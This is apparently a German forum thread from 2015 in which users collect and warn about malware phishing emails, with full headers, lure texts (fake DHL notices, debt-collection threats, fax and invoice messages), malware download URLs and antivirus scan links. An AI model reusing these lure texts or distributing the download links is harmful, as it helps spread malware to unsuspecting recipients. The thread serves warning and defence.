Heute wieder der gleiche Mist, dieses Mal ohne Text, nur mit einem Anhang.

Zustellung Ihrer Sendung 70828156198
PDF-Anhang Name: "DHL_Report_70....
Return-Path: mariola-1985 [at] wp.pl
Received: from mx3.wp.pl ([212.77.101.9]) by mx-ha.web.de (mxweb107) with ESMTPS (Nemesis) ID: [ID filtered]
Received: (wp-smtpd smtp.wp.pl 15913 invoked from network); 18 May 2015 xx:xx:xx +0200
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=wp.pl; s=1024a; t=1431944677; bh=nrnyFBl74LGyO72t1gKUGbRDcKmM8/GduTagW/b/+r4=; h=Subject:From:To; b=bxi6alrN2UakbFTS3g0ll0b/8RbW3oNcR7VE3ZD+x2LA/H0z9aqIQW7v4ugELBUl3 XVPX5aeYdNwY64P2M2NkUexFZWZHzE9RMdSt3xRzvCvCHzvzeX139vS7UcqTC2cxgz 8gJhaCPKId6jbpg4RG/wsk2XJtD28YV08QkUPEio=
Received: from unknown (HELO localhost) (poor [at] spamvictim.tld@[193.238.97.26]) (envelope-sender <poor [at] spamvictim.tld>) by smtp.wp.pl (WP-SMTPD) with ECDHE-RSA-AES256-GCM-SHA384 encrypted SMTP for <poor [at] spamvictim.tld>; 18 May 2015 xx:xx:xx +0200
Subject: Zustellung Ihrer Sendung 70828156198
From: "paket.70828156198 [at] dhl.com"<mariola-1985 [at] wp.pl>
To: poor [at] spamvictim.tld
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="W/UWBazvWAUSZ0A2"
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: YES 0100100 [MYP0]
mariola-1985 [at] wp.pl
212.77.98.9

Die Deutsche Post gab die Info in der Presse bekannt, solche Mails weiterzuleiten an: phishing [at] deutschepost.de

schara56
21.05.2015, 07:19
Received: from hermes.escapenet.ch (hermes.escapenet.ch [193.9.122.17])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 19 May 2015 xx:xx:xx +0200 (CEST)
Received: from VIEWCLIENT023 ([62.2.208.146])
by hermes.escapenet.ch (Escapenet Mail Server v2.0 (Build 1111)) with ASMTP ID: [ID filtered]

greeting
in the attachment


Freundliche Grüsse

G* H*
Assistentin Rekrutierung
____________________

IQPLUS AG
Wülflingerstrasse 59
Postfach
CH-8401 Winterthur

Tel. +41 (0)52 222 xy
Fax +41 (0)52 222 xy
g*.h*@iqplus.ch
www.iqplus.chIm Anhang die entsprechende Malware:
http://www.imgbox.de/users/public/thumbnails/UeOzAXH9FS_t.gif (http://www.imgbox.de/show/img/UeOzAXH9FS.jpg) http://www.imgbox.de/users/public/thumbnails/ZYvXQAlUSZ_t.gif (http://www.imgbox.de/show/img/ZYvXQAlUSZ.jpg)

Das fiese: zu diesem Unternehmen habe ich seit längerem geschäftlichen Kontakt und die Spam kam definitiv von dem Unternehmen über den regulären SMTP-Weg; hier ein Beispielheader einer normalen, sauberen E-Mail von dem Unternehmen:
Received: from hermes.escapenet.ch (hermes.escapenet.ch [193.9.122.17])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 5 May 2015 xx:xx:xx +0200 (CEST)
Received: from HERKULES ([193.9.122.6])
by hermes.escapenet.ch (Escapenet Mail Server v2.0 (Build 1111)) with SMTP ID: [ID filtered]
for <x>; Tue, 05 May 2015 xx:xx:xx +0200

Mittwoch
21.05.2015, 16:39
Das fiese: zu diesem Unternehmen habe ich seit längerem geschäftlichen Kontakt und die Spam kam definitiv von dem Unternehmen über den regulären SMTP-Weg;
Ist der Kontakt eine Kundenbeziehung, sprich ist IQPlus Dein Lieferant? In dem Fall würde ich eine knappe Mail verfassen, in der ich darlege, dass es genug Mitbewerber gibt, die ihre IT sauber halten und keine Schädlinge bei sich laufen haben.

Andernfalls lediglich eine Mail mit der Bitte um Stellungnahme seitens der IT-Mitarbeiter.

Schönen Gruß
Mittwoch

schara56
27.05.2015, 07:42
Received: from webmail.unicodata.ch (webmail.unicodata.ch [194.165.44.24])
(using TLSv1 with cipher AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Tue, 26 May 2015 xx:xx:xx +0200 (CEST)
http://pharmaviva.com.br/el7dEct4u8Ky

Man beachte die geringe Erkennungsrate
http://virusscan.jotti.org/de/scanresult/622007005bb78481c01ec80ae4ec67c354da067f
https://www.virustotal.com/de/file/36a2d4db509c0f3675328ca795457fbb623cbb6a9bc05da741daf3fdf913bedb/analysis/1432705186/

schara56
27.05.2015, 10:56
...] Andernfalls lediglich eine Mail mit der Bitte um Stellungnahme seitens der IT-Mitarbeiter. [...Received: from hermes.escapenet.ch (hermes.escapenet.ch [193.9.122.17])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Wed, 27 May 2015 xx:xx:xx +0200 (CEST)

Bitte Entschuldigen Sie vielmals dieses Missgeschick.
Leider hat sich der Virus bei uns selbständig gemacht.Diese Antwort als "dürftig" zum umschreiben ist noch wohlwollend formuliert.

kjz1
09.06.2015, 16:23
Mal wieder DHL:

Received: from amj221.rev.netart.pl (amj221.rev.netart.pl [85.128.192.221])
by xxxxx (Postfix) with ESMTP
for xxxxx; Tue, 9 Jun 2015 xx:xx:xx +0200 (CEST)
Received: from localhost (unknown [84.10.16.66])
by info-komp.nazwa.pl (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Tue, 9 Jun 2015 xx:xx:xx +0200 (CEST)


Sehr geehrte Kundin, sehr geehrter Kunde,

wir müssen Ihnen keiner mitteilen, dass der zuvor mitgeteilte Zeitpunkt
für die
Zustellung Ihrer Sendung *4833225216* nicht eingehalten werden kann.
Nächste
planmäßige Zustellung ist voraussichtlich am Dienstag, den *09.06..*

Nähere Angaben zu der betroffenen Sendung (z.B. aktueller Status),
erhalten Sie
unter Fortschrittverfolgung, DHL Sendung

http://vnadidlo.sk/B57gGapihdHF

Mit freundlichen Grüßen
Ihr DHL Team

Diese Mail dient lediglich der Information und garantiert nicht die
Zustellung
der Sendung. Auf diese Mail kann nicht geantwortet werden. Ihre
E-Mailadresse
wird ausschließlich für die Paketankündigung der oben genannten Sendung
genutzt
und nicht zu werblichen Zwecken gespeichert.

--------------------------------------------------------------------------------
Deutsche Post AG
Charles-de-Gaulle-Str. 20
53113 Bonn

Registergericht Bonn
HRB 6792
USt-IdNr.: DE 169838187

Vertreten durch den Vorstand
[schnippschnapp]Website <https://www.paket.de>
Kontakt <mailto:paket [at] dhl.de>
Impressum <http://www.dhl.de/de/toolbar/footer/impressum/deutsche-post-
ag.html>

© 2015 DHL

von dort als Download: http://vnadidlo.sk/B57gGapihdHF/Dhl_Status_2765017880893090.zip

IP: 92.240.253.72 ---> LightStorm Communications

Analyse: https://www.virustotal.com/de/url/6460b35c35bfdbeb09fcc972b3616017bf03cc3ee3b0aecd878cd49ab7a4ab5e/analysis/1433858982/

schara56
29.06.2015, 16:11
Received: from mout.kundenserver.de (mout.kundenserver.de [212.227.17.13])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by x (Postfix) with ESMTPS ID: [ID filtered]
for <x>; Mon, 29 Jun 2015 xx:xx:xx +0200 (CEST)
Received: from Donath-PC ([87.185.237.221]) by mrelayeu.kundenserver.de
(mreue101) with ESMTPSA (Nemesis) ID: [ID filtered]
<x>; Mon, 29 Jun 2015 xx:xx:xx +0200

Sehr geehrter Käufer,

Sie haben eine ungedeckte Forderung bei der Firma DirectPay AG. Das von Ihnen vorliegende Bankkonto ist nicht genügend gedeckt um die Lastschrift vorzunehmen.
Die Überweisung erwarten wir bis zum 02.07.2015.
Aufgrund des bestehenden Zahlungsrückstands sind Sie gezwungen dabei, die durch unsere Tätigkeit entstandenen Kosten von 57,78 Euro zu bezahlen. Namens unseren Mandanten DirectPay AG ordnen wir Ihnen an, die offene Gesamtforderung unverzüglich zu decken. Bei Fragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von zwei Werktagen. Die detaillierte Kostenaufstellung, der Sie alle Einzelpositionen entnehmen können, ist beigefügt. Nach Ablauf der Frist wird die Angelegenheit dem Staatsanwalt und der SCHUFA übergeben.

Mit freundlichen Grüßen

Rechtsanwalt W* A*
Im Anhang dann ein schnuckeliges ZIP welches es in sich hat:
http://virusscan.jotti.org/de/scanresult/cbcd95c6fbbda80b428c9a3e34f9e6bbe0a2a585

Frechdachs
07.09.2015, 13:26
Hallo zusammen,

das ist die Tage mit passender Zipdatei hier aufgeschlagen.
Googlet man nach >>OnlinePay24 AG<<, so findet man auch eine Verbraucherschutzseite, die allerdings folgenden Hinweis von Google enthält:
"Diese Website kann Ihren Computer beschädigen."


Guten Tag Mein Name,

unsere Zahlungserinnerung blieb bisher leider ohne Erfolg. Heute bieten wir Ihnen hiermit letztmalig die Chance, den ausstehenden Betrag der Firma OnlinePay24 AG zu überweisen.

Ihre Bank hat die Kontoabbuchung zurück buchen lassen, da Ihr Girokonto im Moment der Abbuchung nicht hinreichend gedeckt wurde.

Wir erwarten die Zahlung zuzüglich der Gebühren bis spätestens 29.08.2015 auf unser Girokonto.

Aufgrund des bestehenden Zahlungsausstands sind Sie gebunden außerdem, die durch unsere Tätigkeit entstandenen Gebühren von 67,75 Euro zu tragen. Namens und in Vollmacht unseren Mandanten OnlinePay24 AG ordnen wir Ihnen an, die noch offene Gesamtforderung unverzüglich zu decken. Bei Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb von 24 Stunden. Die detaillierte Kostenaufstellung, der Sie alle Buchungen entnehmen können, ist beigefügt.

Erfolgt kein Ausgleich der offenen Forderung bis zur festgelegten Frist, werden wir ohne weitere Schreiben die Angelegenheitan das Gericht übergeben und der SCHUFA Holding AG melden.

Mit besten Grüßen

Sachbearbeiter Valera Sebastian

Return-Path: dxdd1 [at] 163.com
Received: from proxy90-5.mail.163.com ([43.230.90.5]) by mx-ha.provider.net
(mxprovider104) with ESMTP (Nemesis) ID: [ID filtered]
< mailadresse [at] provider.de>; Fri, 28 Aug 2015 xx:xx:xx +0200
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=163.com;
s=s110527; h=From:Subject:Date:Message-ID:Mime-Version; bh=dS9XC
CBeXtao01b1eWXL+1jyWUcUOvqY02j/0WT7xqk=; b=a4u8x6cy2mE1SbOxZguB9
gsMjM91efp5hHF+led9WRKV8TwOTivd/dEzsCdhWrzj9EY6JqX+g1TTRgLIV4UQh
QqTGYOku7ewxA/01Hv89A0YJ+gjGG1cNNVcBa4HkwWro+HGSrOTSzBMeUczf6jy4
z3v1Ew2hCVVf5JU13yXpoM=
Received: from Acer-PC (unknown [79.236.12.190])
by smtp2 (Coremail) with SMTP ID: [ID filtered]
Sat, 29 Aug 2015 xx:xx:xx +0800 (CST)
From: "Sachbearbeiter OnlinePay24 AG" <dxdd1 [at] 163.com>
To: "Mein Name" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?Die automatische Lastschrift von OnlinePay24 konnte nicht durchgef=C3=BChrt werden Mein Name?=
Date: Fri, 28 Aug 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_008A_560DCE6D.60A32E64"
X-CM-TRANSID:DNGowECJUGUTjeBVASJOAA--.123S2
X-Coremail-Antispam: 1Uf129KBjvdXoWruFy8Xw4UWryfXryUGry7GFg_yoWktwbEka
4kCrsrGrn2yws2gwnFyrs3Wws8J345uryxuw10qF9rAFyjqrWrZ3WFgF1kCw4fGan5G3s8
Can3JF1Sk34UWjkaLaAFLSUrUUUUUb8apTn2vfkv8UJUUUU8Yxn0WfASr-VFAUDa7-sFnT
9fnUUvcSsGvfC2KfnxnUUI43ZEXa7IUndR65UUUUU==
X-Originating-IP: [79.236.12.190]
X-CM-SenderInfo: xg0gvii6rwjhhfrp/1tbiSgtkAlO-vbe-vwAAsB
Envelope-To: <poor [at] spamvictim.tld>
X-provider-Antispam: 6 (nemesis text pattern profiler); Detail=V3;
X-provider-Antivirus: 0 (no virus found)
X-UI-Filterresults: junk:10;V01:K0:EuluVgXLLJc=:w8lT+mUAVZ+Sk4llWkdeTmuGe0lh
4VnkZK4UQ+87ZmkqF7At6poPcyT7spLJfTVxSG33wM5S04PeCBRFfA+y8q0luK3UyXRgtRjzC
K2p/NXJnfrg949hVz/QSAlk8lB/4iP58LEyh+JOv8grWrpdJgdKHFEjmL/C2XLd0uh1TFYams
Ifzr5bhH/kvZFRGFsiFY5MzmLWld7famy8cigmt/NR8UZVGFuPVGxYiSgWRjZQIeE6F5zyhDm
Spzs1zMG5Q/KjE80g1cLYhrnPojr7qS1rivw5pBQ6zhRuTwOpVs8INlRCZSKQ3Ww1zcUFRO8B
8u83Xp8bp0aeHKlqOWW/zIHlZYWYOxzvNpHH/JaUdwBh1FfmzZxGr0kdGSXsBAavpbKdIMLLH
NSnIxy1df3fT9ZuBCUUo5kTB9HIi2IfQnssYPLxf++D/MVv4YZj8tgDvDqowo958i6LI1UeL/
wMwac+gFp4peJtNixqNclsrr1N1GC+fNJZSo5JTTtsK341NG516JNKXTannuV0IEuVWA67ZCF
TOMO8KwtKE0K89jKgCK+td7LnAZuIu+B0A4dEPKzA8Apy4Jvaa411pwDiXHFQ4KZMaYutA+an
iwzYkFljMQtaQF+0FJuLpHMwnbEHiFwKSLXiBIMd0T+tj9isdExTi7672pRASy89buXV3knrh
RKW+AINOx0ZLHVZl1w7mYkuodbhWPkpwiY9OhWYx5H8HSa+bvAicG2KpvEENv5OywRrPd4yMp
Yfm3KCDzdIYVXz6fp0cELnlOZMHrgk41xz6qXkRmkgDq0Ws3vjeg0aW3uXvN/k8FXQi52gUJV
etsx6GM4w+zHQIbgDORUosOhtaByyxsr4Jj/iYpGZu0Jc1/YzH3sq/4vxcJjsjlT4T/ajAQ/r
ir4/RIUN8M/scdrOmoUdMuADYlO0gEKWNbEpRlKPxsRBZAGOHODexBTVLYvXVOd8yFcqEWzxv
4ZM4zUsAv3PVQrfWoxzUSXe0C8bMhqC5KZU9m7h49iOxZaAF6ShZ2q4NO4Cwy6vSoJv2751DO
r7cXTAEab2Z9OutDjdzazQIm4zrVW2woUh3RmqU3fXpHbqpsrIPR41fVb0Ak0SsOUQgisd3p/
Q9n9CdWRML7sDj1QP0NEjuJ5S5xfOxjmk85wQLkaS5GTDksTvKLRS3s4GtKR9gDq2anewpbQf
0w+6kLH9R/fXwIWg3i3sGwxJoXd5sHW9zMLCfn+ySqNCn3q4NKExa/epiqYMzE+BhM2SFCgIW
b++aMb96RMvgcK4PRd10jkPBCttcelePvXbYmuyx8X3mdUsBGnjicWMMzbvaIzoNSeWjbYTI1
4XnCblQekOP4FvnqOPwYR0GwJofYy7ptcDCs64u7sfSQmKLaT7Tt60jFbB7z+pWRnZ6QY5A0Z
NR3AvYBssNVXr+wdmGDxMKsJzc/Uz1dqg89MRJKJUnjYaEICp1PGuAP/0NXaX2XwA11su0Jcm
ZK3/Fg==

------=_NextPart_000_008A_560DCE6D.60A32E64
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Gruß Frechdachs

hoppala
07.09.2015, 13:35
Da hat wohl der "X-provider-Antivirus" gepennt oder ist nicht auf aktuellem Stand. Die ZIP-Datei enthält natürlich einen Trojaner.
Und mit OnlinePay24 hat das Ganze natürlich so wenig zu tun wie die bekannten Sparkassen-Virenmails mit der Sparkasse.

hoppala

Mittwoch
07.09.2015, 17:31
Und mit OnlinePay24 hat das Ganze natürlich so wenig zu tun wie die bekannten Sparkassen-Virenmails mit der Sparkasse.
Eben. Und deswegen habe ich es an das passende Thema getackert. Ist ein schlichter Versuch eines Schädlings, sich selbst zu verbreiten.

Schönen Gruß
Mittwoch

kjz1
23.10.2015, 13:51
Eine neue Masche, die mir noch nicht bekannt war:

Received: from nmt.ne.jp (static-5-103-12-38.energifyn.net [5.103.12.38])
by xxxxx (Postfix) with ESMTP
for xxxxx; Fri, 23 Oct 2015 xx:xx:xx +0200 (CEST)
Received: from [5.103.12.38] by q4WGMSZ5k.com with NNFMP; Fri, 23 Oct
2015 xx:xx:xx +0100
Received: from [0.105.103.105] by aigis.nmt.ne.jp with NNFMP; Fri, 23
Oct 2015 xx:xx:xx +0100
Received: by 0.105.103.105; Fri, 23 Oct 2015 xx:xx:xx +0100


Receipt for Payment
Thank you for filing your taxes with FreeTaxUSA! This email serves as a
receipt for the
program services and products purchased. Please keep a copy of this
email in your records.

Order Details
Customer Email - meine [at] mailadresse
Customer No. - 8065589505-648298293
Order No. - 1620838
Order Date - Fri, 23 Oct 2015 xx:xx:xx +0100

Items in Your Order for Tax Year 2015
1 - Federal Tax Return Program
1 - Louisiana State Tax Return
1 - eCheck Convenience Fee


Total Amount PaID: [ID filtered]
Payment Method - checking account ending in 785399060

Charges will appear on your bank statement as:
TAXHAWK INC
IMPORTANT REMINDER
Purchasing a product or service does not automatically
e-file your return. Make sure you have finished the filing process and
received
confirmation that your tax return has been filed.

Attention RUSSELL OR CAROLYN MAGEE:

We know you are busy and probably haven't had a chance to log in
and try your new Internet Banking service. Logging in is your first
step in taking control of your finances. With this service, you can
check your account balance online, view up-to-date account history
online and more. Learn more by logging into our Web site and start
taking control of your finances now.

If you have any questions about your new Internet Banking service,
feel free to call (985) 735-6555 or email koayu [at] nmt.ne.jp.

Im Anhang:


Content-Type: application/zip; name="postfix notation census
classification play-house.zip"
Content-Description: postfix notation census classification play-house.zip
Content-Disposition: attachment; filename="postfix notation census
classification play-house.zip"; size=23782;
creation-date="Fri, 23 Oct 2015 xx:xx:xx +0100";
modification-date="Fri, 23 Oct 2015 xx:xx:xx +0100"
Content-Transfer-Encoding: base64

Wird bisher nur von wenigen Virenscannern erkannt.

kjz1
03.11.2015, 08:44
Eine weitere Variante:

Received: from servmaster1.thinkup.fr ([176.31.106.128]) by mx-ha.gmx.net
(mxgmx112) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost (localhost.localdomain [127.0.0.1])
by servmaster1.thinkup.fr (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Mon, 2 Nov 2015 xx:xx:xx +0100 (CET)
X-Virus-Scanned: Debian amavisd-new at ns392662.ip-176-31-106.eu
Received: from servmaster1.thinkup.fr ([127.0.0.1])
by localhost (servmaster1.thinkup.fr [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP ID: [ID filtered]
Mon, 2 Nov 2015 xx:xx:xx +0100 (CET)
Received: by servmaster1.thinkup.fr (Postfix, from userID: [ID filtered]
ID: [ID filtered]

IP: 176.31.106.128 ---> OVH (also mal wieder der franz. Oberschwarzhut)


You have a new fax!

You can find your fax document in the attachment.

Date of scan: Mon, 2 Nov 2015 xx:xx:xx +0300
File size: 146 Kb
Scan quality: 300 DPI
Pages scanned: 8
Processed in: 50 seconds
Sender: Clyde Mooney
Fax name: scan_000947558.doc

Thanks for choosing Interfax!

Im Anhang:


Content-Type: application/zip; name="scan_000947558.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=scan_000947558.zip

https://virusscan.jotti.org/de-DE/filescanjob/0mvnsnsc5z

https://www.virustotal.com/de/file/adc23f16f159cc501eef705a0a746b8f10381a17915ae1c7a34dd34c0e023e12/analysis/1446536034/

kjz1
11.11.2015, 14:05
neuer Versuch:

Received: from gator3097.hostgator.com ([50.87.144.132]) by mx-ha.gmx.net
(mxgmx003) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from kds by gator3097.hostgator.com with local (Exim 4.85) (envelope-from <inkasso [at] paypal.de>) ID: [ID filtered]


Sehr geehrte(r) <mein richtiger Name>,

Ihr Kreditinstitut hat die Lastschrift zurück gebucht, da Ihr Bankkonto
zur Zeit der Buchung nicht genügend gedeckt wurde. Unsere Erinnerung
blieb bisher leider erfolglos. Nun bieten wir Ihnen hiermit letztmalig
die Chance, den ausstehenden Betrag unseren Mandanten Pay Online GmbH zu
überweisen.

Aufgrund des andauernden Zahlungsrückstands sind Sie gezwungen
zuzüglich, die durch unsere Beauftragung entstandenen Gebühren von 75,51
Euro zu tragen. Die Höhe des Betrags kann aufgrund kürzlich berechneter
Verzugszinsen abweichen.

In Vollmacht unseren Mandanten Pay Online GmbH ordnen wir Ihnen an, die
noch offene Gesamtforderung unverzüglich zu decken. Bei Fragen oder
Anregungen erwarten wir eine Kontaktaufnahme innerhalb von 72 Stunden.

Eine vollständige Kostenaufstellung, der Sie alle Positionen entnehmen
können, fügen wir bei. Wir erwarten die Überweisung bis spätestens
14.11.2015 auf unser Bankkonto.

Mit verbindlichen Grüßen

Stellvertretender Rechtsanwalt Fabian Myer

Anhang:


Content-Type: application/octet-stream; name="Ausgleich stornierten
Buchung Ihrer Bestellung Pay Online GmbH.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Ausgleich stornierten Buchung
Ihrer Bestellung Pay Online GmbH.zip"

Mein Name war richtig, aber mit einem Schreibfehler (anhand dessen ich wahrscheinlich die gecrackte Datenbank benennen könnte). Und: Pay Online ist nicht Paypal und was zum Geier ist ein stellvertretender Rechtsanwalt?

Immer noch nicht überall erkannt:

https://www.virustotal.com/de/file/e85f642f2661acafa3c1201ae8aa9bc01e194993f4d26346282229e24654d95c/analysis/1447246611/

https://virusscan.jotti.org/de-DE/filescanjob/wzuqo2scvn

Eniac
12.11.2015, 09:03
Hier versucht es eine angebliche "Firma Bank-Pay GmbH" mit der lustigen email-Adresse anwaltschaft#paypal.de

Return-Path: <anwaltschaft [at] paypal.de>
Received: from gator3028.hostgator.com ([50.87.144.49]) by mx-ha.gmx.net (mxgmx110) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from looker by gator3028.hostgator.com with local (Exim 4.85) (envelope-from <poor [at] spamvictim.tld>) ID: [ID filtered]
Date: Thu, 12 Nov 2015 xx:xx:xx -0600
To: Vorname Name <poor [at] spamvictim.tld>
From: Abrechnung Bank-Pay GmbH <anwaltschaft [at] paypal.de>
Subject: Automatische Konto-Lastschrift 08154711 konnte nicht vorgenommen werden 10.11.2015
Message-ID: [ID filtered]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1_b1d1986cde0ee0379463779e2eed2090"
Content-Transfer-Encoding: 8bit


Sehr geehrte(r) Vorname Name,

Ihr Kreditinstitut hat die Lastschrift zurück gebucht, da Ihr Konto zur Zeit der Buchung nicht hinreichend gedeckt war. Unsere Aufforderung blieb bis jetzt leider ohne Erfolg. Nun bieten wir Ihnen hiermit letztmalig die Chance, den ausbleibenden Betrag der Firma Bank-Pay GmbH zu überweisen.

Aufgrund des andauernden Zahlungsverzug sind Sie gebunden dabei, die durch unsere Beauftragung entstandenen Kosten von 52,04 Euro zu bezahlen. Die Höhe des Betrags kann aufgrund berechneter Verzugszinsen abweichen.

Namens und in Vollmacht unseren Mandanten Bank-Pay GmbH fordern wir Sie auf, die noch offene Gesamtforderung sofort zu bezahlen. Bei Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb von 48 Stunden.

Die vollständige Forderungsausstellung, der Sie alle Buchungen entnehmen können, ist beigefügt. Wir erwarten die Zahlung zuzüglich der Mahnkosten bis zum 13.11.2015 auf unser Bankkonto.

Mit freundlichen Grüßen

Abrechnung Julian Schäufelein

Im Anhang eine Datei Ausgleich 10.11.2015 - Abrechnung Bank-Pay GmbH.zip die eine Datei Rechnung - Abrechnung Bank-Pay GmbH.com ( 109568 bytes ) enthält. Der Schädling wird von den meisten AntiVirus-Programmen noch nicht erkannt.

https://www.virustotal.com/de/file/77cb27d265a32691ead92532ba64b8515da11818af10270cc7adcce1b1e7299b/analysis/ --> QVM20.1.Malware.Gen
https://www.metascan-online.com/#!/results/file/d829c76e66794a20bbd3875d3c802565/regular --> Trojan.Crypt.Heur.gen


Eniac

kjz1
22.11.2015, 10:12
Wieder mal:

for <poor [at] spamvictim.tld>; Sun, 22 Nov 2015 xx:xx:xx +0100 (CET)
Received: from server.guyverdating.com ([162.144.85.18]) by mx-ha.gmx.net
(mxgmx008) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from guyverda by server.guyverdating.com with local (Exim 4.86)
(envelope-from <guyverda [at] server.guyverdating.com>) ID: [ID filtered]

You have received a new fax.

Please check your fax document in the attachment to this e-mail.

Pages sent: 9
Resolution: 400 DPI
Author: Kyle Reese
Scanned: Sat, 21 Nov 2015 xx:xx:xx +0300
Scan time: 20 seconds
File size: 300 Kb
Fax name: task0000279140.doc

Thank you for using Interfax!

Content-Type: application/zip; name="task0000279140.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=task0000279140.zip

https://www.virustotal.com/de/file/a1090bde46d98d9978cdadb76048ebebb751054e7db4b1ec9fe9560e9ef2737e/analysis/1448183251/

https://virusscan.jotti.org/de-DE/filescanjob/yvuob252rc

kjz1
22.11.2015, 20:17
Und noch einer von denselben Ganoven:

Received: from gator4219.hostgator.com ([108.167.189.45]) by mx-ha.gmx.net
(mxgmx013) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from ab9368 by gator4219.hostgator.com with local (Exim 4.85)
(envelope-from <ab9368 [at] gator4219.hostgator.com>) ID: [ID filtered]


You have a new fax!

Scanned fax document is attached to this email.

Scanned: Sun, 22 Nov 2015 xx:xx:xx +0300
Scanned in: 24 seconds
Scan quality: 500 DPI
Pages number: 11
File size: 134 Kb
File name: task-00129500.doc
Author: Milton Jordan

Thanks for choosing Interfax!

Content-Type: application/zip; name="task-00129500.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=task-00129500.zip

https://virusscan.jotti.org/de-DE/filescanjob/crlr1ojzoe

https://www.virustotal.com/de/file/70d785a46158657e48bc3dbe184737133517b67e74818394df7188b0211d0cbc/analysis/1448219606/

Syphedias
25.11.2015, 10:48
Relativ gut gemachte 1&1 Rechnung erhalten, die komischerweise trotz verseuchtem Anhang nicht von GMX ausgefiltert wurde.
Ich wollte die E-Mail an 1und1 weiterleiten mit dem Hinweis die mal zu prüfen, und schwupps wurde die Mail nicht versandt, wegen verseuchtem Anhang. Komisch... Ausgangsscanner scheint bei GMX besser zu klappen als Eingangsscanner.

Erst mal der Header:

Return-Path: <_www [at] web.i-cloud.co.nz>
Received: from mailer.web.i-cloud.co.nz ([202.89.49.129]) by mx-ha.gmx.net (mxgmx103) with ESMTP (Nemesis) ID: [ID filtered]
Received: by mailer.web.i-cloud.co.nz (Postfix, from userID: [ID filtered]
To: ***@gmx.de
Subject: Ihre Rechnung 100040339457 vom 23.11.2015
From: Rechnungsstelle 1&1 Internet SE <rechnungsstelle [at] 1und1.de>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="==Multipart_Boundary_xda99e2297f155a4f854951f606d87656x"
Message-ID: [ID filtered]
Date: Tue, 24 Nov 2015 xx:xx:xx +1300 (NZDT)
Envelope-To: <***@gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)

Der Text der E-Mail scheint einer echten 1und1 E-Mail entnommen, die Links führen alle zu 1und1.
Lediglich die fehlende Anrede und das "Zip" Attachment, entlarven diese E-Mail als dreisten Versuch den PC zu verseuchen.




Sehr geehrte Frau/Herr (erstes Anzeichen für Fake),

heute erhalten Sie Ihre Rechnung vom 23.11.2015 für Ihr Produkt 1&1 Starter. Sie finden diese im Anhang als PDF-Datei.

Damit Sie Ihre Rechnung lesen und ausdrucken können, benötigen Sie den Adobe Acrobat Reader. Sie können ihn hier kostenlos herunterladen.

Der Rechnungsbetrag in Höhe von 114,23 EUR wird am 29.11.2015 von Ihrem Konto abgebucht.

Ist die hinterlegte Bankverbindung noch aktuell? Sie können diese im 1&1 Control-Center prüfen und ändern.

Weitere Informationen zu Ihrem Vertrag finden Sie im 1&1 Control-Center.

Ich wünsche Ihnen viel Freude mit 1&1.

Freundliche Grüße aus Montabaur

Weiterhin soll die Echtheit der E-Mail durch die Angabe einer Kundennummer bestätigt werden.
So heißt es



Ihre Kundennummer: 224311312

Mit dem 1&1 Control-Center erreichen Sie Ihre persönliche 1&1 Welt. Hier können Sie Ihre Daten, Verträge, Rechnungen und Zahlungen verwalten sowie alle wichtigen Einstellungen vornehmen: Zum 1&1 Control-Center.
Kundencenter-Infos entfernt.

Hinweis:

Eine echte 1&1 E-Mail beinhaltet immer Ihre Kundennummer (22***). Diese können Sie in Ihrem 1&1 Control-Center und auf Ihren Rechnungen überprüfen.

E-Mail Anhang kann ich, wenn gewünscht, heute Nachmittag scannen lassen und das Ergebnis hier dann posten.

kjz1
25.11.2015, 20:29
Und wieder einmal:

Received: from newserver.dotcomsecrets.com ([199.116.250.88]) by
mx-ha.gmx.net (mxgmx103) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from simplech by newserver.dotcomsecrets.com with local (Exim
4.86) (envelope-from <simplech [at] newserver.dotcomsecrets.com>) ID: [ID filtered]

New incoming fax document.

You can find your fax document in the attachment.

Number of pages: 6
File name: scan00000973712.doc
File size: 111 Kb
Scan duration: 48 seconds
From: Warren Couch
Quality: 200 DPI
Scan date: Tue, 24 Nov 2015 xx:xx:xx +0300

Thanks for using Interfax service!

https://virusscan.jotti.org/de-DE/filescanjob/ajn8p7g1cl

https://www.virustotal.com/de/file/0c5c64db616c9123f83ad8ef7bd3ae8c42ce81f58347631bf158f18abb8514cd/analysis/1448479587/

kjz1
30.11.2015, 09:10
Wieder aus derselben Ecke:

